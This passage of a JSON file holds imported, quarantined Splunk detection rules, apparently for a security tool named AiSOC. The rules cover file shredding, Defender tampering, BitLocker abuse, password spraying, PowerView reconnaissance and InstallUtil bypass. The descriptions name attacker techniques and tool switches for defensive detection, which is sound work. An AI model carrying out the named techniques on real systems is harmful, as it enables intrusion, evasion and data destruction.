If confirmed malicious, this activity could lead to the permanent destruction of critical files, severely impacting system integrity and data availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-shred-overwrite-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce2bde4d-a1d4-4452-8c87-98440e5adfb3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_shred_overwrite_command.yml" } }, { "id": "splunk-security-content-ce5a0962-849f-4720-a678-753fe6674479", "type": "detection", "name": "Prohibited Network Traffic Allowed", "description": "The following analytic detects instances where network traffic, identified by port and transport layer protocol as prohibited in the \"lookup_interesting_ports\" table, is allowed. It uses the Network_Traffic data model to cross-reference traffic data against predefined security policies. This activity is significant for a SOC as it highlights potential misconfigurations or policy violations that could lead to unauthorized access or data exfiltration. 
If confirmed malicious, this could allow attackers to bypass network defenses, leading to potential data breaches and compromising the organization's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/prohibited-network-traffic-allowed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce5a0962-849f-4720-a678-753fe6674479", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/prohibited_network_traffic_allowed.yml" } }, { "id": "splunk-security-content-ce633e56-25b2-11ec-9e76-acde48001122", "type": "detection", "name": "Suspicious Copy on System32", "description": "The following analytic detects potentially suspicious file copy operations targeting the\nSystem32 or SysWow64 directories as source, often indicative of malicious activity.\nIt leverages data from Endpoint Detection and Response (EDR) agents,\nfocusing on activity initiated by command-line tools like cmd.exe or PowerShell.\nThis behavior is significant as it may indicate an attempt to evade defenses by copying\nan existing binary from the system directory and renaming it.\nIf confirmed malicious, this activity could allow an attacker to execute\ncode undetected and potentially leading to system compromise or further lateral movement\nwithin the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": 
null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-copy-on-system32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce633e56-25b2-11ec-9e76-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_copy_on_system32.yml" } }, { "id": "splunk-security-content-ceaed840-56b3-4a70-b8e1-d762b1c5c08c", "type": "detection", "name": "Windows RDP Connection Successful", "description": "The following analytic detects successful Remote Desktop Protocol (RDP) connections by monitoring EventCode 1149 from the Windows TerminalServices RemoteConnectionManager Operational log. This detection is significant as successful RDP connections can indicate remote access to a system, which may be leveraged by attackers to control or exfiltrate data. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further lateral movement within the network. 
Monitoring successful RDP connections is crucial for identifying potential security breaches and mitigating risks promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1563.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-connection-successful.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ceaed840-56b3-4a70-b8e1-d762b1c5c08c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_connection_successful.yml" } }, { "id": "splunk-security-content-ced50492-8849-11ec-9f68-acde48001122", "type": "detection", "name": "Windows Remote Assistance Spawning Process", "description": "The following analytic detects Microsoft Remote Assistance (msra.exe) spawning PowerShell.exe or cmd.exe as a child process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where msra.exe is the parent process. This activity is significant because msra.exe typically does not spawn command-line interfaces, indicating potential process injection or misuse. 
If confirmed malicious, an attacker could use this technique to execute arbitrary commands, escalate privileges, or maintain persistence on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-assistance-spawning-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ced50492-8849-11ec-9f68-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_assistance_spawning_process.yml" } }, { "id": "splunk-security-content-cee573a0-7587-48e6-ae99-10e8c657e89a", "type": "detection", "name": "Windows Modify Registry Disable Restricted Admin", "description": "The following analytic detects modifications to the Windows registry entry \"DisableRestrictedAdmin,\" which controls the Restricted Admin mode behavior. This detection leverages registry activity logs from endpoint data sources like Sysmon or Carbon Black. Monitoring this activity is crucial as changes to this setting can disable a security feature that limits credential exposure during remote connections. 
If confirmed malicious, an attacker could weaken security controls, increasing the risk of credential theft and unauthorized access to sensitive systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-restricted-admin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cee573a0-7587-48e6-ae99-10e8c657e89a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_restricted_admin.yml" } }, { "id": "splunk-security-content-cf056b65-44b2-4d32-9172-d6b6f081a376", "type": "detection", "name": "Windows Account Discovery With NetUser PreauthNotRequire", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetUser with the -PreauthNotRequire parameter, leveraging Event ID 4104. This method identifies attempts to query Active Directory user accounts that do not require Kerberos preauthentication. Monitoring this activity is crucial as it can indicate reconnaissance efforts by an attacker to identify potentially vulnerable accounts. 
If confirmed malicious, this behavior could lead to further exploitation, such as unauthorized access or privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-discovery-with-netuser-preauthnotrequire.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf056b65-44b2-4d32-9172-d6b6f081a376", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_discovery_with_netuser_preauthnotrequire.yml" } }, { "id": "splunk-security-content-cf06a0ee-ffa9-4ed3-be77-0670ed9bab52", "type": "detection", "name": "Windows Unusual Count Of Users Remotely Failed To Auth From Host", "description": "The following analytic identifies a source host failing to authenticate against a remote host with multiple users, potentially indicating a Password Spraying attack. It leverages Windows Event 4625 (failed logon attempts) and Logon Type 3 (remote authentication) to detect this behavior. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges within an Active Directory environment. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-remotely-failed-to-auth-from-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf06a0ee-ffa9-4ed3-be77-0670ed9bab52", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_remotely_failed_to_auth_from_host.yml" } }, { "id": "splunk-security-content-cf192860-2d94-40db-9a51-c04a2e8a8f8b", "type": "detection", "name": "Windows WMI Impersonate Token", "description": "The following analytic detects potential WMI token impersonation activities in a process or command. It leverages Sysmon EventCode 10 to identify instances where `wmiprvse.exe` has a duplicate handle or full granted access in a target process. This behavior is significant as it is commonly used by malware like Qakbot for privilege escalation or defense evasion. 
If confirmed malicious, this activity could allow an attacker to gain elevated privileges, evade defenses, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-impersonate-token.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf192860-2d94-40db-9a51-c04a2e8a8f8b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_impersonate_token.yml" } }, { "id": "splunk-security-content-cf8d753e-a8fe-11eb-8f58-acde48001122", "type": "detection", "name": "Icacls Deny Command", "description": "The following analytic detects instances where an adversary modifies\nsecurity permissions of a file or directory using commands like \"icacls.exe\", \"cacls.exe\",\nor \"xcacls.exe\" with deny options. It leverages data from Endpoint Detection and\nResponse (EDR) agents, focusing on process names and command-line executions. This\nactivity is significant as it is commonly used by Advanced Persistent Threats (APTs)\nand coinminer scripts to evade detection and impede access to critical files. 
If\nconfirmed malicious, this could allow attackers to maintain persistence and hinder\nincident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/icacls-deny-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf8d753e-a8fe-11eb-8f58-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/icacls_deny_command.yml" } }, { "id": "splunk-security-content-cfa7b9ac-43f0-11ec-9b48-acde48001122", "type": "detection", "name": "Windows InstallUtil Uninstall Option", "description": "The following analytic detects the use of the Windows InstallUtil.exe binary with the `/u` (uninstall) switch, which can execute code while bypassing application control. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because it can indicate an attempt to execute malicious code without administrative privileges. 
If confirmed malicious, an attacker could achieve code execution, potentially leading to further system compromise or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-uninstall-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cfa7b9ac-43f0-11ec-9b48-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_uninstall_option.yml" } }, { "id": "splunk-security-content-cfe094b4-0737-4a33-9d63-e0562ce2b883", "type": "detection", "name": "ESXi Bulk VM Termination", "description": "This detection identifies when all virtual machines on an ESXi host are abruptly terminated, which may indicate malicious activity such as a deliberate denial-of-service, ransomware staging, or an attempt to destroy critical workloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1673", "T1529", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-bulk-vm-termination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cfe094b4-0737-4a33-9d63-e0562ce2b883", 
"source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_bulk_vm_termination.yml" } }, { "id": "splunk-security-content-cfe7cca7-2746-4bdf-b712-b01ed819b9de", "type": "detection", "name": "Cloud Security Groups Modifications by User", "description": "The following analytic identifies unusual modifications to security groups in your cloud environment by users, focusing on actions such as modifications, deletions, or creations over 30-minute intervals. It leverages cloud infrastructure logs and calculates the standard deviation for each user, using the 3-sigma rule to detect anomalies. This activity is significant as it may indicate a compromised account or insider threat. If confirmed malicious, attackers could alter security group configurations, potentially exposing sensitive resources or disrupting services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-security-groups-modifications-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cfe7cca7-2746-4bdf-b712-b01ed819b9de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_security_groups_modifications_by_user.yml" } }, { "id": "splunk-security-content-d0026380-b3c4-4da0-ac8e-02790063ff6b", "type": "detection", "name": "Windows Command and Scripting Interpreter Hunting Path 
Traversal", "description": "The following analytic identifies path traversal command-line executions,\nleveraging data from Endpoint Detection and Response (EDR) agents. It detects patterns\nin command-line arguments indicative of path traversal techniques, such as multiple\ninstances of \"/..\", \"\\..\", or \"\\\\..\". This activity is significant as it often indicates\nattempts to evade defenses by executing malicious code, such as through msdt.exe.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary\ncode, potentially leading to system compromise, data exfiltration, or further lateral\nmovement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-command-and-scripting-interpreter-hunting-path-traversal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0026380-b3c4-4da0-ac8e-02790063ff6b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml" } }, { "id": "splunk-security-content-d0434864-b043-41e3-8c08-30e53605e9cb", "type": "detection", "name": "Windows SQL Server Critical Procedures Enabled", "description": "This detection identifies when critical SQL Server configuration options are modified, including \"Ad Hoc Distributed Queries\", \"external scripts enabled\", \"Ole Automation Procedures\", \"clr enabled\", and \"clr strict security\". 
These features can be abused by attackers for various malicious purposes - Ad Hoc Distributed Queries enables Active Directory reconnaissance through ADSI provider, external scripts and Ole Automation allow execution of arbitrary code, and CLR features can be used to run custom assemblies. Enabling these features could indicate attempts to gain code execution or perform reconnaissance through SQL Server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-critical-procedures-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0434864-b043-41e3-8c08-30e53605e9cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_critical_procedures_enabled.yml" } }, { "id": "splunk-security-content-d051d94f-c792-445e-b5d2-0b904f93ac09", "type": "detection", "name": "ESXi VIB Acceptance Level Tampering", "description": "This detection identifies changes to the VIB (vSphere Installation Bundle) acceptance level on an ESXi host. 
Modifying the acceptance level, such as setting it to CommunitySupported, lowers the system's integrity enforcement and may allow the installation of unsigned or unverified software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-vib-acceptance-level-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d051d94f-c792-445e-b5d2-0b904f93ac09", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_vib_acceptance_level_tampering.yml" } }, { "id": "splunk-security-content-d05204a5-9f1c-4946-a7f3-4fa58d76d5fd", "type": "detection", "name": "Linux Stop Services", "description": "The following analytic detects attempts to stop or clear a service on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"systemctl,\" \"service,\" and \"svcadm\" executing stop commands. This activity is significant as adversaries often terminate security or critical services to disable defenses or disrupt operations, as seen in malware like Industroyer2. 
If confirmed malicious, this could lead to the disabling of security mechanisms, allowing attackers to persist, escalate privileges, or deploy destructive payloads, severely impacting system integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-stop-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d05204a5-9f1c-4946-a7f3-4fa58d76d5fd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_stop_services.yml" } }, { "id": "splunk-security-content-d0895c20-de71-4fd2-b56c-3fcdb888eba1", "type": "detection", "name": "Azure AD Multiple Denied MFA Requests For User", "description": "The following analytic detects an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically when more than nine MFA prompts are declined. It leverages Azure Active Directory (Azure AD) sign-in logs, focusing on \"Sign-in activity\" events with error code 500121 and additional details indicating \"MFA denied; user declined the authentication.\" This behavior is significant as it may indicate a targeted attack or account compromise attempt, with the user actively declining unauthorized access. 
If confirmed malicious, it could lead to data exfiltration, lateral movement, or further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-denied-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0895c20-de71-4fd2-b56c-3fcdb888eba1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_denied_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-d0c07718-19d1-4de2-aea9-e0ffff0ed986", "type": "detection", "name": "Windows Defender ASR or Threat Configuration Tamper", "description": "The following analytic detects the use of commands to disable Attack Surface Reduction (ASR) rules or change threat default actions in Windows Defender.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"Add-MpPreference\" or \"Set-MpPreference\".\nThis activity is significant because adversaries often use it to bypass Windows Defender, allowing malicious code to execute undetected.\nIf confirmed malicious, this behavior could enable attackers to evade antivirus detection, maintain persistence, and execute further malicious activities without interference from Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-or-threat-configuration-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0c07718-19d1-4de2-aea9-e0ffff0ed986", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_or_threat_configuration_tamper.yml" } }, { "id": "splunk-security-content-d0e6ec70-6e40-41a2-8b93-8d9ff077a746", "type": "detection", "name": "Windows BitLocker Suspicious Command Usage", "description": "This analytic is developed to detect the usage of BitLocker commands used to disable or impact boot settings. The malware ShrinkLocker uses various commands to change how BitLocker handles encryption, potentially bypassing TPM requirements, enabling BitLocker without TPM, and enforcing specific startup key and PIN configurations. Such modifications can weaken system security, making unauthorized access and data breaches easier. 
Detecting these changes is crucial for maintaining robust encryption and data protection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitlocker-suspicious-command-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0e6ec70-6e40-41a2-8b93-8d9ff077a746", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitlocker_suspicious_command_usage.yml" } }, { "id": "splunk-security-content-d0f6a5e5-dbfd-46e1-8bd5-2e2905947c33", "type": "detection", "name": "Windows New Deny Permission Set On Service SD Via Sc.EXE", "description": "The following analytic detects changes in a service security descriptor where a new deny ACE (access control entry) has been added.\nIt leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving the \"sc.exe\" binary with the \"sdset\" flag targeting any service and adding a dedicated deny ACE to specific groups.\nIf confirmed malicious, this could allow an attacker to escalate their privileges, blind defenses, and more.\nInvestigate the appropriate services and groups to determine if the behavior is malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-new-deny-permission-set-on-service-sd-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0f6a5e5-dbfd-46e1-8bd5-2e2905947c33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_deny_permission_set_on_service_sd_via_sc_exe.yml" } }, { "id": "splunk-security-content-d131673f-ede1-47f2-93a1-0108d3e7fafd", "type": "detection", "name": "Windows Process Injection In Non-Service SearchIndexer", "description": "The following analytic identifies instances of the searchindexer.exe process that are not spawned by services.exe, indicating potential process injection. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent processes. This activity is significant because QakBot malware often uses a fake searchindexer.exe to evade detection and perform malicious actions such as data exfiltration and keystroke logging. 
If confirmed malicious, this activity could allow attackers to maintain persistence, steal sensitive information, and communicate with command and control servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-in-non-service-searchindexer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d131673f-ede1-47f2-93a1-0108d3e7fafd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml" } }, { "id": "splunk-security-content-d15e9bd9-ef64-4d84-bc04-f62955a9fee8", "type": "detection", "name": "ASL AWS Credential Access RDS Password reset", "description": "The following analytic detects the resetting of the master user password for an Amazon RDS DB instance. It leverages AWS CloudTrail logs from Amazon Security Lake to identify events where the `ModifyDBInstance` API call includes a new `masterUserPassword` parameter. This activity is significant because unauthorized password resets can grant attackers access to sensitive data stored in production databases, such as credit card information, PII, and healthcare data. If confirmed malicious, this could lead to data breaches, regulatory non-compliance, and significant reputational damage. 
Immediate investigation is required to determine the legitimacy of the password reset.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-credential-access-rds-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d15e9bd9-ef64-4d84-bc04-f62955a9fee8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_credential_access_rds_password_reset.yml" } }, { "id": "splunk-security-content-d17dae9e-2618-11ec-b9f5-acde48001122", "type": "detection", "name": "Winhlp32 Spawning a Process", "description": "The following analytic detects winhlp32.exe spawning a child process that loads a file from appdata, programdata, or temp directories. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. This activity is significant because winhlp32.exe has known vulnerabilities and can be exploited to execute malicious code. If confirmed malicious, an attacker could use this technique to execute arbitrary scripts, escalate privileges, or maintain persistence within the environment. 
Analysts should review parallel processes, module loads, and file modifications for further suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winhlp32-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d17dae9e-2618-11ec-b9f5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winhlp32_spawning_a_process.yml" } }, { "id": "splunk-security-content-d1a45d84-8dd1-4b31-8854-62b0b1d5da0b", "type": "detection", "name": "Splunk AppDynamics Secure Application Alerts", "description": "The following analytic leverages alerts from Splunk AppDynamics SecureApp, which identifies and monitors exploit attempts targeting business applications. The primary attacks observed involve exploiting vulnerabilities in web applications, including injection attacks (SQL, API abuse), deserialization vulnerabilities, remote code execution attempts, Log4j exploitation, and zero-day attacks. These attacks are typically aimed at gaining unauthorized access, exfiltrating sensitive data, or disrupting application functionality.\n\nSplunk AppDynamics SecureApp provides real-time detection of these threats by analyzing application-layer events and correlating attack behavior with known vulnerability signatures. 